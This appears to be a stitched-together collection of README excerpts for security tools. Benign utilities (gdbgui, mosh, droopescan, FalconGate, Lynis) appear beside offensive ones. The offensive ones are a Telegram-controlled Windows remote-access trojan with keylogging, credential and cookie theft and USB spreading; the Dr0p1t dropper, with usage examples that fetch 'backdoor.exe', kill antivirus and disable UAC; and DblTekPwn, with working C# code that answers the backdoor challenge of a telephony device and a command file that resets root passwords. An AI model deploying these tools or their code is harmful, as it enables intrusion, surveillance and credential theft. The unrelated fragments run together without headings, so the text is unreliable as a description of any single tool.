ruby hatcloud.rb -h or --help 
ruby hatcloud.rb -b your site

ruby hatcloud.rb --byp your site

                           /\
                          /_.\
                    _,.-'/ `",\'-.,_
                 -~^    /______\`~~-^~:

  ____            _       _____                                   
 |  _ \          (_)     |  __ \                                  
 | |_) |_ __ __ _ _ _ __ | |  | | __ _ _ __ ___   __ _  __ _  ___ 
 |  _ <| '__/ _` | | '_ \| |  | |/ _` | '_ ` _ \ / _` |/ _` |/ _ \
 | |_) | | | (_| | | | | | |__| | (_| | | | | | | (_| | (_| |  __/
 |____/|_|  \__,_|_|_| |_|_____/ \__,_|_| |_| |_|\__,_|\__, |\___|
                                                        __/ |     
                                                       |___/      

--> Coded by: Mehul Jain(mehulj94@gmail.com)
--> Github: https://github.com/mehulj94
--> Twitter: https://twitter.com/wayfarermj
--> For windows only

  ______         _                       
 |  ____|       | |                      
 | |__ ___  __ _| |_ _   _ _ __ ___  ___ 
 |  __/ _ \/ _` | __| | | | '__/ _ \/ __|
 | | |  __/ (_| | |_| |_| | | |  __/\__ \
 |_|  \___|\__,_|\__|\__,_|_|  \___||___/


--> Persistance
--> USB spreading
--> Port Scanner
--> Router Finder
--> Run shell commands
--> Keylogger
--> Insert keystrokes
--> Record audio
--> Webserver
--> Screenshot logging
--> Download files in the host
--> Execute shutdown, restart, logoff, lock
--> Send drive tree structure
--> Set email template
--> Rename Files
--> Change wallpaper
--> Open website
--> Send Password for
• Chrome
• Mozilla
• Filezilla
• Core FTP
• CyberDuck
• FTPNavigator
• WinSCP
• Outlook
• Putty
• Skype
• Generic Network
--> Cookie stealer
--> Send active windows
--> Gather system information
• Drives list
• Internal and External IP
• Ipconfig /all output
• Platform

• Telegram setup:
  • Install Telegram app and search for "BOTFATHER".
  • Type /help to see all possible commands.
  • Click on or type /newbot to create a new bot.
  • Name your bot.
  • You should see a new API token generated for it.
• Dedicated Gmail account. Remember to check "allow connection from less secure apps" in gmail settings.
• Set access_token in eclipse.py to token given by the botfather.
• Set CHAT_ID in eclipse.py. Send a message from the app and use the telegram api to get this chat id.

bot.getMe() will give output {'first_name': 'Your Bot', 'username': 'YourBot', 'id': 123456789}

• Set copied_startup_filename in Eclipse.py.
• Set Gmail password and Username in /Breathe/SendData.py

• whoisonline- list active slaves
  

  This command will list all the active slaves.

• destroy- delete&clean up
  

  This command will remove the stub from host and will remove registry entries.

• cmd- execute command on CMD
  

  Run shell commands on host

• download- url (startup, desktop, default)
  

  This will download files in the host computer.

• execute- shutdown, restart, logoff, lock
  

  Execute the following commands

• screenshot- take screenshot
  

  Take screenshot of the host of computer.

• send- passwords, drivetree, driveslist, keystrokes, openwindows
  

  This command will sends passwords (saved browser passwords, FTP, Putty..), directory tree of host (upto level 2), logged keystrokes and windows which are currently open

• set- email (0:Default,1:URL,2:Update), filename (0: Itself, 1: Others), keystrokes (text)
  

  This command can set email template (default, download from url, update current template with text you'll send), rename filenames or insert keystrokes in host.

• start- website (URL), keylogger, recaudio (time), webserver (Port), spread
  

  This command can open website, start keylogger, record audio, start webserver, USB Spreading

• stop- keylogger, webserver
  

  This command will stop keylogger or webserver

• wallpaper- change wallpaper (URL)
  

  Changes wallpaper of host computer

• find- openports (host, threads, ports), router
  

  This command will find open ports and the router the host is using

• help- print this usage
  

• Telepot
• PyAudio
• PyCyrpto
• Pyasn1
• Pillow
• Install PyHook
• Install PyWin32
• Install Microsoft Visual C++ Compiler for Python
• Install PyInstaller

• FreeBSD: pf rdr and divert-to, ipfw fwd, ipfilter rdr
• OpenBSD: pf rdr-to and divert-to
• Linux: netfilter REDIRECT and TPROXY
• Mac OS X: pf rdr and ipfw fwd

make
make test       # optional unit tests
make install    # optional install

python Struts2Shell.py

squidmagic # python squidmagic.py /var/log/squid3/access.log

                 _     _                       _      
                (_)   | |                     (_)     
 ___  __ _ _   _ _  __| |_ __ ___   __ _  __ _ _  ___ 
/ __|/ _` | | | | |/ _` | '_ ` _ \ / _` |/ _` | |/ __|
\__ \ (_| | |_| | | (_| | | | | | | (_| | (_| | | (__ 
|___/\__, |\__,_|_|\__,_|_| |_| |_|\__,_|\__, |_|\___|
        | |                               __/ |       
        |_|                              |___/        
     Analyzing...

Analyzing by SBL Advisory...
    Spam server detected, ip is 65.182.101.221
Analyzing by SBL_CSS Advisory...
    safe server detected, host or ip is 65.182.101.221
Analyzing by PBL Advisory...
    safe server detected, host or ip is 65.182.101.221

<?php
namespace SquidApp\Core;

require dirname(__DIR__) . '/lib/vendor/autoload.php';

$banner = new \SquidApp\Squid();
$squidmagic = new FileSystem();

// output banner
echo $banner->bannerAction();

// Scans a directory for files
$squidmagic->scandirs('squidmagic/Collector path');

// Checks if file exists in certain location 
$squidmagic->fileExists('Collector Path/server.php');

// run server
$squidmagic->openInBackground('Collector Path/lib/bin/');

squidmagic/lib # php squidmagic.php 


                              | |                          
         ___  __ _ _   _ _  __| |_ __ ___   __ _  __ _ _  ___ 
        / __|/ _` | | | | |/ _` | '_ ` _ \ / _` |/ _` | |/ __|
        \__ \ (_| | |_| | | (_| | | | | | | (_| | (_| | | (__ 
        |___/\__, |\__,_|_|\__,_|_| |_| |_|\__,_|\__, |_|\___|
                | |                               __/ |       
                |_|                              |___/ 
                    squidmagic collector started   

[sudo] pip install gdbgui --upgrade

gdbgui [binary to debug]

• Debug a different program in each tab (new gdb instance is spawned for each tab)
• Set/remove breakpoints
• View stack, threads
• Switch frame on stack, switch between threads
• Inspect memory in hex/character form
• View all registers
• Dropdown of all files used to compile binary, with autocomplete functionality
• Source code explorer with ability to jump to line
• Show assembly next to source code, highlighting current instruction. Can also step through instructions.

• Actively developed and compatible with the latest version of gdb (7.12)
• Does only one thing: debugs programs. No integrated build system, no project settings, nothing to make things more complicated than they need to be. Just a lightweight frontend.
• Design influenced by the amazing Chrome debugger: source code on the left, side panel on the right with collapsable widgets, console on the bottom
• Full gdb command line utility built in
• Written in widely used languages (Python and JavaScript)
• Open source and free

Positional arguments:

command : (Optional) The binary and arguments to run in gdb. This is a way to script the intial loading of the inferior binary you wish to debug. For example gdbgui ./mybinary -myarg -flag1 -flag2 . Binaries and arguments can also be input through the browser interface after launching.

Flags (all are optional):

-h, --help	show this help message and exit
-p PORT , --port PORT
	The port on which gdbgui will be hosted
--host HOST	The host ip address on which gdbgui serve.
-g GDB , --gdb GDB
	Path to gdb executable or lldb-mi executable. Defaults is 'gdb'. lldb support is experimental and not fully functional at this time.
-v, --version	Print version
--debug	The debug flag of this Flask application. Pass this flag when debugging gdbgui itself to automatically reload the server when changes are detected
-n, --no_browser
	By default, the browser will open with gdb gui. Pass this flag so the browser does not open.

1. backend.py : The backend consists of a single Python file, which makes use of pygdbmi to interact with a gdb subprocess, and Flask to set up url routing, websockets, and http responses.
2. gdbgui.pug : HTML file that defines the frontend
3. gdbgui.js : The majority of the application is contained in this file. It dynamically updates the page, and maintains gdb state. It sends AJAX requests and uses websockets to interact with gdb through the server, then gets the response and updates the DOM as necessary.
4. gdbgui.css : css stylesheet

1. Auto-Update - No need to come over here, and look for new version every time.
2. Better Error Handling - Some tools may cause error, that's why I added this option.
3. Graphical Interface - For just click & click.
4. Malware Protectiong - All tools are downloaded from their original source, so no malwares or any viruses.
5. Multi-Platform - Many tools are for designed differently for Mac, Windows & Linux, so I added option for that. Choose your platform and you're good to go.
6. Better organised - Everything is better organised nothing like search everything, and all that mess.

git clone https://github.com/rajeshmajumdar/PloitKit.git

ploitkit.py

python ploitkit.py

• Framework works with Windows and Linux
• Download executable on target system and execute it silently..
• The executable size small compared to other droppers generated the same way
• Self destruct function so that the dropper will kill and delete itself after finishing it work
• Adding executable after downloading it to startup
• Adding executable after downloading it to task scheduler ( UAC not matters )
• Finding and killing the antivirus before running the malware
• Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
• The ability to disable UAC
• In running powershell scripts it can bypass execution policy
• Using UPX to compress the dropper after creating it
• Choose an icon for the dropper after creating it

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

• Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

• Python libraries requirements in requirements.txt

• Wine
• Python 2.7 on Wine Machine

Note : You must have root access

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

• Kali Linux - SANA
• Ubuntu 14.04-16.04 LTS
• Windows 10/8.1/8

• Pyinstaller compiling in Linux using wine
• Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
• Added the ability to disable and bypass UAC
• Updated the antivirus list in the antivirus killer
• Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work
• Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
• Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

• Twitter
• Facebook

• Blocking of websites 
• Presence of systems that could be responsible for censorship and/or surveillance
• Speed and performance of your network

LDAP support

Faraday Plugin

Details are everything

Changes

• Added LDAP support for authentication 
• Removed grouping by issue tracker option in status report

• Added command line option to automatically install the license files before launching Faraday 
• Fixed bug when editing workspaces with maximum allowed workspaces reached 
• Improved login in Web UI 
• Improved the validation applied to passwords when editing them in the Web UI

• Improved UX in users list Web UI 
• Improved GTK UX when the client loses connection to the server 

• Added link to name column in Hosts list

• Fixed bug in SQLMap plugin that made the client freeze 
• Fixed bug when creating/updating Credentials 
• Fixed bug in the WEB UI - menu explanation bubbles were hidden behind inputs

• Fixed conflict resolution when the object was deleted from another client before resolving the conflict 
• Improved FPlugin
• Improved the installation process 
• Improved SQLMap plugin to support –tables and –columns options 
• Improved navigation in Web UI 
• Merged PR #137 - CScan improvements: bug fixing, change plugin format and removed unnecessary file output 
• Merged PR #173 - Hostnames: added hostnames to plugins 
• Merged PR #105 - OSint: added the possibility of using a DB other than Shodan 
• The Status Report now remembers the sorting column and order
• Created a requirements_extras.txt file to handle optional packages for specific features

• Block several types of Malware based on open source blacklists (see detailed list in file intel-sources.md )
• Block Malware using the Tor network
• Detect and report potential Malware DNS requests based on VirusTotal reports
• Detect and report the presence of Malware executables and other components based on VirusTotal reports
• Detect and report Domain Generation Algorithm (DGA) Malware patterns
• Detect and report on Malware spamming activity
• Detect and report on internal and outbound port scans
• Report details of all new devices connected to your network
• Block ads based on open source lists
• Monitor a custom list of personal or family accounts used in online services for public reports of hacking

• Bro IDS
• Python 2.7
• Nginx
• Dnsmasq
• Exim
• PHP

• Download the correct system image for your device from the downloads page .
  
• Extract the image to a folder in your computer.
  
• Write the image to your SD card.
  

• Insert the SD card in your device and plug it to any available ethernet port in your router.
  
• Power on your device and wait few minutes until it will acquire the correct configuration for your network.
  
• Login to your router and disable its DHCP server function
  
• Login to FalconGate's web app and configure the email address(es) to be used as recipients for alerts and your VirusTotal API key
  

https://[FalconGate IP address]
Username: admin
Password: falcongate

• Navigate to the "Configuration" page and fill in the correct fields

• Download and install the OS image to your Raspberry Pi or Banana Pi device

• Connect to your device via SSH

$ ssh pi@<IP assigned to your RPi>

• Install Git if you don't have it yet

$ sudo apt-get update
$ sudo apt-get install git

• Clone FalconGate's repository to a local folder

$ cd /opt
$ sudo git clone https://github.com/A3sal0n/FalconGate.git

• Run the installation script inside FalconGate's folder

$ cd FalconGate/
$ sudo python install.py

• Login to your router and disable its DHCP server function

• Reboot your device to apply all the configuration changes
  
• Login to FalconGate's web app and configure the email address(es) to be used as recipients for alerts and your VirusTotal API key
  

• Change the default SSH password in your Raspberry Pi or Banana Pi devices
• Regenerate the openssh-server certificates for SSH encryption

• Drupal.
• SilverStripe.
• Wordpress.

• Joomla (version enumeration and interesting URLs only).
• Moodle (identification doesn't work yet. You need to force 'scan moodle')

computer:~/droopescan$ droopescan scan drupal -u http://example.org/ -t 8
[+] No themes found.

[+] Possible interesting urls found:
    Default changelog file - https://www.example.org/CHANGELOG.txt
    Default admin - https://www.example.org/user/login

[+] Possible version(s):
    7.34

[+] Plugins found:
    views https://www.example.org/sites/all/modules/views/
        https://www.example.org/sites/all/modules/views/README.txt
        https://www.example.org/sites/all/modules/views/LICENSE.txt
    token https://www.example.org/sites/all/modules/token/
        https://www.example.org/sites/all/modules/token/README.txt
        https://www.example.org/sites/all/modules/token/LICENSE.txt
    pathauto https://www.example.org/sites/all/modules/pathauto/
        https://www.example.org/sites/all/modules/pathauto/README.txt
        https://www.example.org/sites/all/modules/pathauto/LICENSE.txt
        https://www.example.org/sites/all/modules/pathauto/API.txt
    libraries https://www.example.org/sites/all/modules/libraries/
        https://www.example.org/sites/all/modules/libraries/CHANGELOG.txt
        https://www.example.org/sites/all/modules/libraries/README.txt
        https://www.example.org/sites/all/modules/libraries/LICENSE.txt
    entity https://www.example.org/sites/all/modules/entity/
        https://www.example.org/sites/all/modules/entity/README.txt
        https://www.example.org/sites/all/modules/entity/LICENSE.txt
    google_analytics https://www.example.org/sites/all/modules/google_analytics/
        https://www.example.org/sites/all/modules/google_analytics/README.txt
        https://www.example.org/sites/all/modules/google_analytics/LICENSE.txt
    ctools https://www.example.org/sites/all/modules/ctools/
        https://www.example.org/sites/all/modules/ctools/CHANGELOG.txt
        https://www.example.org/sites/all/modules/ctools/LICENSE.txt
        https://www.example.org/sites/all/modules/ctools/API.txt
    features https://www.example.org/sites/all/modules/features/
        https://www.example.org/sites/all/modules/features/CHANGELOG.txt
        https://www.example.org/sites/all/modules/features/README.txt
        https://www.example.org/sites/all/modules/features/LICENSE.txt
        https://www.example.org/sites/all/modules/features/API.txt
    [... snip for README ...]

[+] Scan finished (0:04:59.502427 elapsed)

droopescan --help
droopescan scan --help

• is fast
• is stable
• is up to date
• allows simultaneous scanning of multiple sites
• is 100% python

apt-get install python-pip
pip install droopescan

git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt
./droopescan scan --help

• p -- Plugin checks : Performs several thousand HTTP requests and returns a listing of all plugins found to be installed in the target host.
• t -- Theme checks : As above, but for themes.
• v -- Version checks : Downloads several files and, based on the checksums of these files, returns a list of all possible versions.
• i -- Interesting url checks : Checks for interesting urls (admin panels, readme files, etc.)

    droopescan scan drupal -u example.org

    droopescan scan -u example.org

    droopescan scan drupal -U list_of_urls.txt

    droopescan scan -U list_of_urls.txt

http://localhost/drupal/6.0/
http://localhost/drupal/6.1/
http://localhost/drupal/6.10/
http://localhost/drupal/6.11/
http://localhost/drupal/6.12/

192.168.1.1 example.org
http://192.168.1.1/ example.org
http://192.168.1.2/drupal/  example.org

machine secret.google.com
    login admin@google.com
    password Winter01

export http_proxy='user:password@localhost:8080'
export https_proxy='user:password@localhost:8080'
droopescan scan drupal --url http://localhost/drupal

{
  "themes": {
    "is_empty": true,
    "finds": [

    ]
  },
  "interesting urls": {
    "is_empty": false,
    "finds": [
      {
        "url": "https:\/\/www.drupal.org\/CHANGELOG.txt",
        "description": "Default changelog file."
      },
      {
        "url": "https:\/\/www.drupal.org\/user\/login",
        "description": "Default admin."
      }
    ]
  },
  "version": {
    "is_empty": false,
    "finds": [
      "7.29",
      "7.30",
      "7.31"
    ]
  },
  "plugins": {
    "is_empty": false,
    "finds": [
      {
        "url": "https:\/\/www.drupal.org\/sites\/all\/modules\/views\/",
        "name": "views"
      },
      [...snip...]
    ]
  }
}

    $ droopescan scan drupal -U six_and_above.txt -e v
    {"host": "http://localhost/drupal-7.6/", "version": {"is_empty": false, "finds": ["7.6"]}}
    {"host": "http://localhost/drupal-7.7/", "version": {"is_empty": false, "finds": ["7.7"]}}
    {"host": "http://localhost/drupal-7.8/", "version": {"is_empty": false, "finds": ["7.8"]}}
    {"host": "http://localhost/drupal-7.9/", "version": {"is_empty": false, "finds": ["7.9"]}}
    {"host": "http://localhost/drupal-7.10/", "version": {"is_empty": false, "finds": ["7.10"]}}
    {"host": "http://localhost/drupal-7.11/", "version": {"is_empty": false, "finds": ["7.11"]}}
    {"host": "http://localhost/drupal-7.12/", "version": {"is_empty": false, "finds": ["7.12"]}}
    {"host": "http://localhost/drupal-7.13/", "version": {"is_empty": false, "finds": ["7.13"]}}
    {"host": "http://localhost/drupal-7.14/", "version": {"is_empty": false, "finds": ["7.14"]}}
    {"host": "http://localhost/drupal-7.15/", "version": {"is_empty": false, "finds": ["7.15"]}}
    {"host": "http://localhost/drupal-7.16/", "version": {"is_empty": false, "finds": ["7.16"]}}
    {"host": "http://localhost/drupal-7.17/", "version": {"is_empty": false, "finds": ["7.17"]}}
    {"host": "http://localhost/drupal-7.18/", "version": {"is_empty": false, "finds": ["7.18"]}}
    {"host": "http://localhost/drupal-7.19/", "version": {"is_empty": false, "finds": ["7.19"]}}
    {"host": "http://localhost/drupal-7.20/", "version": {"is_empty": false, "finds": ["7.20"]}}
    {"host": "http://localhost/drupal-7.21/", "version": {"is_empty": false, "finds": ["7.21"]}}
    {"host": "http://localhost/drupal-7.22/", "version": {"is_empty": false, "finds": ["7.22"]}}
    {"host": "http://localhost/drupal-7.23/", "version": {"is_empty": false, "finds": ["7.23"]}}
    {"host": "http://localhost/drupal-7.24/", "version": {"is_empty": false, "finds": ["7.24"]}}
    {"host": "http://localhost/drupal-7.25/", "version": {"is_empty": false, "finds": ["7.25"]}}
    {"host": "http://localhost/drupal-7.26/", "version": {"is_empty": false, "finds": ["7.26"]}}
    {"host": "http://localhost/drupal-7.27/", "version": {"is_empty": false, "finds": ["7.27"]}}
    {"host": "http://localhost/drupal-7.28/", "version": {"is_empty": false, "finds": ["7.28"]}}
    {"host": "http://localhost/drupal-7.29/", "version": {"is_empty": false, "finds": ["7.29"]}}
    {"host": "http://localhost/drupal-7.30/", "version": {"is_empty": false, "finds": ["7.30"]}}
    {"host": "http://localhost/drupal-7.31/", "version": {"is_empty": false, "finds": ["7.31"]}}
    {"host": "http://localhost/drupal-7.32/", "version": {"is_empty": false, "finds": ["7.32"]}}
    {"host": "http://localhost/drupal-7.33/", "version": {"is_empty": false, "finds": ["7.33"]}}
    {"host": "http://localhost/drupal-7.34/", "version": {"is_empty": false, "finds": ["7.34"]}}

computer:~/droopescan# droopescan scan silverstripe -u http://localhost -n 10 -e p --debug-requests
[head] http://localhost/framework/... 403
[head] http://localhost/cms/css/layout.css... 404
[head] http://localhost/framework/css/UploadField.css... 200
[head] http://localhost/misc/test/error/404/ispresent.html... 404
[head] http://localhost/widgetextensions/... 404
[head] http://localhost/orbit/... 404
[head] http://localhost/sitemap/... 404
[head] http://localhost/simplestspam/... 404
[head] http://localhost/ecommerce_modifier_example/... 404
[head] http://localhost/silverstripe-hashpath/... 404
[head] http://localhost/timeline/... 404
[head] http://localhost/silverstripe-hiddenfields/... 404
[head] http://localhost/addressable/... 404
[head] http://localhost/silverstripe-description/... 404
[+] No plugins found.

[+] Scan finished (0:00:00.058422 elapsed)

    droopescan stats

Functionality available for ‘drupal’:
- Enumerate plugins (XXXX plugins.)
- Enumerate themes (XXXX themes.)
- Enumerate interesting urls (X urls.)
- Enumerate version (up to version X.X.X-alphaXX, X.XX, X.XX.)
Functionality available for ‘joomla’:
- Enumerate interesting urls (X urls.)
- Enumerate version (up to version XX.X, X.X.X, X.X.XX.rcX.)
Functionality available for ‘wordpress’:
- Enumerate interesting urls (X urls.)
- Enumerate version (up to version X.X.X, X.X.X, X.X.X.)
Functionality available for ‘silverstripe’:
- Enumerate plugins (XXX plugins.)
- Enumerate themes (XX themes.)
- Enumerate interesting urls (X urls.)
- Enumerate version (up to version X.X.XX, X.X.XX, X.X.XX.)

$ cp plugins/example.py plugins/joomla.py
$ cp plugins.d/example.conf plugins.d/joomla.conf

• The class name needs to be Joomla.
• The plugin label (located at Meta.label) needs to be changed to joomla.
• At the end of the file, the register call needs to be modified to reflect the correct class name.
• The exposed function, 'example', needs to be renamed to joomla.

    @controller.expose(help='example scanner')
    def joomla(self):
        self.plugin_init()

[joomla]
enable_plugin = true

$ droopescan scan joomla
[+] --url parameter is required.

    apt-get install libxslt1-dev libxml2-dev zlib1g-dev python python-pip python-dev python3 python3-pip python3-dev
    pip install -r requirements.txt -r requirements_test.txt
    pip3 install -r requirements.txt -r requirements_test.txt
    ./droopescan test

./droopescan test -s test_integration_drupal

• Mosh keeps the session alive if the client goes to sleep and wakes up later, or temporarily loses its Internet connection.
• Mosh allows the client and server to "roam" and change IP addresses, while keeping the connection alive. Unlike SSH, Mosh can be used while switching between Wi-Fi networks or from Wi-Fi to cellular data to wired Ethernet.
• The Mosh client runs a predictive model of the server's behavior in the background and tries to guess intelligently how each keystroke will affect the screen state. When it is confident in its predictions, it will show them to the user while waiting for confirmation from the server. Most typing and uses of the left- and right-arrow keys can be echoed immediately.
  As a result, Mosh is usable on high-latency links, e.g. on a cellular data connection or spotty Wi-Fi. In distinction from previous attempts at local echo modes in other protocols, Mosh works properly with full-screen applications such as emacs, vi, alpine, and irssi, and automatically recovers from occasional prediction errors within an RTT. On high-latency links, Mosh underlines its predictions while they are outstanding and removes the underline when they are confirmed by the server.

• Mosh adjusts its frame rate so as not to fill up network queues on slow links, so "Control-C" always works within an RTT to halt a runaway process.
• Mosh warns the user when it has not heard from the server in a while.
• Mosh supports lossy links that lose a significant fraction of their packets.
• Mosh handles some Unicode edge cases better than SSH and existing terminal emulators by themselves, but requires a UTF-8 environment to run.
• Mosh leverages SSH to set up the connection and authenticate users. Mosh does not contain any privileged (root) code.

$ mosh [user@]host

• Mosh Web site:
  https://mosh.org
  
• mosh-devel@mit.edu mailing list:
  https://mailman.mit.edu/mailman/listinfo/mosh-devel
  
• mosh-users@mit.edu mailing list:
  https://mailman.mit.edu/mailman/listinfo/mosh-users
  
• #mosh channel on Freenode IRC
  https://webchat.freenode.net/?channels=mosh
  

1. The ability to cascade the ownership label of an asset (e.g. if a Registrant Name is known to belong to the target organization, then the hosts and networks registered with that name shall be marked as belonging to the target organization)
2. The ability transform assets into other potentially related assets through querying open sources such as Google and Shodan
3. The ability to visualize the relationships of those assets through a zoomable pack layout

git clone https://github.com/penafieljlm/inquisitor.git
cd inquisitor
pip install cython
pip install unqlite
python setup.py install

usage: inquisitor.py [-h] {scan,status,classify,dump,visualize} ...

optional arguments:
  -h, --help            show this help message and exit

command:
  {scan,status,classify,dump,visualize}
                        The action to perform.
    scan                Search OSINT sources for intelligence based on known
                        assets belonging to the target.
    status              Prints out the current status of the specified
                        intelligence database.
    classify            Classifies an existing asset as either belonging or
                        not belonging to the target. Adds a new asset with the
                        specified classification if none is present.
    dump                Dumps the contents of the database in JSON format
    visualize           Create a D3.js visualization based on the contents of
                        the specified intelligence database.

usage: inquisitor.py scan [-h] [--google-dev-key GOOGLE_DEV_KEY]
                          [--google-cse-id GOOGLE_CSE_ID]
                          [--shodan-api-key SHODAN_API_KEY]
                          DATABASE

positional arguments:
  DATABASE              The path to the intelligence database to use. If
                        specified file does not exist, a new one will be
                        created.

optional arguments:
  -h, --help            show this help message and exit
  --google-dev-key GOOGLE_DEV_KEY
                        Specifies the developer key to use to query Google
                        Custom Search. Visit the Google APIs Console
                        (http://code.google.com/apis/console) to get an API
                        key. If notspecified, the script will simply skip
                        asset transforms that involve Google Search.
  --google-cse-id GOOGLE_CSE_ID
                        Specifies the custom search engine to query. Visit the
                        Google Custom Search Console
                        (https://cse.google.com/cse/all) to create your own
                        Google Custom Search Engine. If not specified, the
                        script will simply skip asset transforms that involve
                        Google Search.
  --shodan-api-key SHODAN_API_KEY
                        Specifies the API key to use to query Shodan. Log into
                        your Shodan account (https://www.shodan.io/) and look
                        at the top right corner of the page in order to view
                        your API key. If not specified, the script will simply
                        skip asset transforms that involve Shodan.

usage: inquisitor.py status [-h] DATABASE

positional arguments:
  DATABASE    The path to the intelligence database to use. If specified file
              does not exist, a new one will be created.

optional arguments:
  -h, --help  show this help message and exit

usage: inquisitor.py classify [-h] [-ar REGISTRANT [REGISTRANT ...]]
                              [-ur REGISTRANT [REGISTRANT ...]]
                              [-rr REGISTRANT [REGISTRANT ...]]
                              [-ab BLOCK [BLOCK ...]] [-ub BLOCK [BLOCK ...]]
                              [-rb BLOCK [BLOCK ...]] [-ah HOST [HOST ...]]
                              [-uh HOST [HOST ...]] [-rh HOST [HOST ...]]
                              [-ae EMAIL [EMAIL ...]] [-ue EMAIL [EMAIL ...]]
                              [-re EMAIL [EMAIL ...]]
                              DATABASE

positional arguments:
  DATABASE              The path to the intelligence database to use. If
                        specified file does not exist, a new one will be
                        created.

optional arguments:
  -h, --help            show this help message and exit
  -ar REGISTRANT [REGISTRANT ...], --accept-registrant REGISTRANT [REGISTRANT ...]
                        Specifies a registrant to classify as accepted.
  -ur REGISTRANT [REGISTRANT ...], --unmark-registrant REGISTRANT [REGISTRANT ...]
                        Specifies a registrant to classify as unmarked.
  -rr REGISTRANT [REGISTRANT ...], --reject-registrant REGISTRANT [REGISTRANT ...]
                        Specifies a registrant to classify as rejected.
  -ab BLOCK [BLOCK ...], --accept-block BLOCK [BLOCK ...]
                        Specifies a block to classify as accepted.
  -ub BLOCK [BLOCK ...], --unmark-block BLOCK [BLOCK ...]
                        Specifies a block to classify as unmarked.
  -rb BLOCK [BLOCK ...], --reject-block BLOCK [BLOCK ...]
                        Specifies a block to classify as rejected.
  -ah HOST [HOST ...], --accept-host HOST [HOST ...]
                        Specifies a host to classify as accepted.
  -uh HOST [HOST ...], --unmark-host HOST [HOST ...]
                        Specifies a host to classify as unmarked.
  -rh HOST [HOST ...], --reject-host HOST [HOST ...]
                        Specifies a host to classify as rejected.
  -ae EMAIL [EMAIL ...], --accept-email EMAIL [EMAIL ...]
                        Specifies a email to classify as accepted.
  -ue EMAIL [EMAIL ...], --unmark-email EMAIL [EMAIL ...]
                        Specifies a email to classify as unmarked.
  -re EMAIL [EMAIL ...], --reject-email EMAIL [EMAIL ...]
                        Specifies a email to classify as rejected.

usage: inquisitor.py dump [-h] DATABASE JSON_FILE

positional arguments:
  DATABASE    The path to the intelligence database to use. If specified file
              does not exist, a new one will be created.
  JSON_FILE   The path to dump the JSON file to. Overwrites existing files.

optional arguments:
  -h, --help  show this help message and exit

usage: inquisitor.py visualize [-h] DATABASE HTML_FILE

positional arguments:
  DATABASE    The path to the intelligence database to use. If specified file
              does not exist, a new one will be created.
  HTML_FILE   The path to dump the visualization file to. Overwrites existing
              files.

optional arguments:
  -h, --help  show this help message and exit

$ go get github.com/asciimoo/wuzz
$ "$GOPATH/bin/wuzz" --help

• Colors
• Response specific filters (xpath, etc..)
• Better navigation
• File upload
• Autocompletion
• Tests

static string ComputeResponse(string challengeStr)
{
    int challenge = Convert.ToInt32(challengeStr.Substring(1)); // Get just the number after 'N'.

    string modified = (challenge + 20139 + (challenge >> 3)).ToString(); // Perform some dummy 1337 operations.

    byte[] buffer = new byte[64];
    // Copy the string into the first part of the buffer.
    for (int i = 0; i < modified.Length; i++)
        buffer[i] = (byte)modified[i];

    var md5 = MD5.Create();
    byte[] hash = md5.ComputeHash(buffer); // Calculate the MD5 of the buffer.

    StringBuilder sb = new StringBuilder(); // Will hold the results.
    // Take the unpadded hex value of the first six bytes of the MD5.
    for (int i = 0; i < 6; i++)
        sb.Append(hash[i].ToString("x"));

    return sb.ToString(); // Profit
}

USAGE: DblTekPwn.exe [MODE] [HOSTS] [OUTPUT]

[MODE]:
-c --compute-response [CHALLENGE]         Computes a response to the given challenge.
-r --root-shell                           Starts a root shell with the vulnerable host.
-s --send-commands    [COMMAND_FILE]      Sends commands from a file to vulnerable hosts.
-t --test                                 Tests hosts and determines if they are vulnerable.
-h --help                                 Displays this help and exits.

[HOSTS]:
-n --name             [IP]                Specifies a single IP address.
-f --file             [IP_FILE]           Specifies a file with IP\nIP\nIP.

[OUTPUT]:
-o --output           [OUTPUT_FILE]       Specifies an output file. Default stdin.

DblTekPwn.exe --root-shell --name 192.168.1.1

Password: ***********

DblTekPwn --compute-response N1746203308

d6176d3aab2

DblTekPwn.exe --test --file list.txt --output results.txt

192.168.1.0
192.168.1.1
192.168.1.2:1337
192.168.1.3
192.168.1.4:2323

192.168.1.0 False
192.168.1.1 True
192.168.1.2:1337 True
192.168.1.3 False
192.168.1.4:2323 False

DblTekPwn.exe --send-commands cmds.txt --file list.txt --output results.txt

192.168.1.0
192.168.1.1
192.168.1.2:1337
192.168.1.3
192.168.1.4:2323

passwd root
toor
toor

exit

192.168.1.0 False
192.168.1.1 True
192.168.1.2:1337 True
192.168.1.3 False
192.168.1.4:2323 False

• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• and others

1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

• Security auditing
• Compliance testing (e.g. PCI, HIPAA, SOx)
• Vulnerability detection and scanning
• System hardening

• Best practices
